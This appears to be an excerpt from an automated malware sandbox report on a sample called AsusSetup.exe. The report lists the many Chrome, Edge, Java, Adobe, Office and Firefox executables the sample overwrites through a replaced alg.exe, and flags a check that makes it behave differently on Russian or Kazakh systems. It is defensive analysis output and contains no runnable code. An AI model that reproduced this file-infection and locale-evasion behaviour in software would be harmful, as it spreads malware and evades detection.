Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exeJump to behavior
Source: C:\Users\user\Desktop\AsusSetup.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\elevation_service.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\policytool.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.ShowHelp.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\7-Zip\Uninstall.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeJump to behavior
Source: C:\Users\user\Desktop\AsusSetup.exeSystem file written: C:\Windows\System32\FXSSVC.exeJump to behavior
Source: C:\Users\user\Desktop\AsusSetup.exeSystem file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\rmiregistry.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Integration\Addons\OneDriveSetup.exeJump to behavior
Source: C:\Users\user\Desktop\AsusSetup.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\CLVIEW.EXEJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\pack200.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
Source: C:\Users\user\Desktop\AsusSetup.exeSystem file written: C:\Windows\System32\alg.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.132\117.0.5938.132_chrome_installer.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\rmid.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\7-Zip\7zFM.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\klist.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\tnameserv.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Integration\Integrator.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\CNFNOT32.EXEJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\excelcnv.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Info.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\AppSharingHookController.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\orbd.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Google\Chrome\Application\chrome_proxy.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdate.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\ktab.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Google\Chrome\Application\117.0.5938.132\chrome_pwa_launcher.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\chrmstp.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\servertool.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Mozilla Firefox\pingsender.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXEJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\setup.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exeJump to dropped file
Source: C:\Users\user\Desktop\AsusSetup.exeFile created: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\7-Zip\7z.exeJump to dropped file
Source: C:\Users\user\Desktop\AsusSetup.exeFile created: C:\Windows\System32\AppVClient.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\7-Zip\7zG.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\keytool.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateBroker.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Google\Chrome\Application\117.0.5938.132\notification_helper.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Mozilla Firefox\firefox.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Mozilla Firefox\updater.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\kinit.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\AutoIt3\Au3Check.exeJump to dropped file
Source: C:\Users\user\Desktop\AsusSetup.exeFile created: C:\Program Files\Google\Chrome\Application\117.0.5938.132\elevation_service.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\policytool.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\7-Zip\Uninstall.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeJump to dropped file
Source: C:\Users\user\Desktop\AsusSetup.exeFile created: C:\Windows\System32\FXSSVC.exeJump to dropped file
Source: C:\Users\user\Desktop\AsusSetup.exeFile created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\rmiregistry.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Integration\Addons\OneDriveSetup.exeJump to dropped file
Source: C:\Users\user\Desktop\AsusSetup.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\pack200.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to dropped file
Source: C:\Users\user\Desktop\AsusSetup.exeFile created: C:\Windows\System32\alg.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.132\117.0.5938.132_chrome_installer.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\rmid.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\7-Zip\7zFM.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\klist.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\tnameserv.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\AutoIt3\Au3Info.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\orbd.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Google\Chrome\Application\chrome_proxy.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdate.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\ktab.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exeJump to dropped file
Source: C:\Users\user\Desktop\AsusSetup.exeFile created: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exeJump to dropped file
Source: C:\Users\user\Desktop\AsusSetup.exeFile created: C:\Windows\System32\AppVClient.exeJump to dropped file
Source: C:\Users\user\Desktop\AsusSetup.exeFile created: C:\Windows\System32\FXSSVC.exeJump to dropped file
Source: C:\Users\user\Desktop\AsusSetup.exeFile created: C:\Windows\System32\alg.exeJump to dropped file
Source: C:\Users\user\Desktop\AsusSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion

barindex
Contains functionality to behave differently if execute on a Russian/Kazak computer
Source: C:\Users\user\Desktop\AsusSetup.exeCode function: 0_2_02065346 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] 0_2_02065346
Source: C:\Windows\System32\AppVClient.exeCode function: 6_2_00535346 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] 6_2_00535346
Source: C:\Windows\System32\FXSSVC.exeCode function: 9_2_00425346 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] 9_2_00425346
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeCode function: 10_2_02255346 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] 10_2_02255346
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.132\chrome_pwa_launcher.exeJump to dropped file
Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\chrmstp.exeJump to dropped file
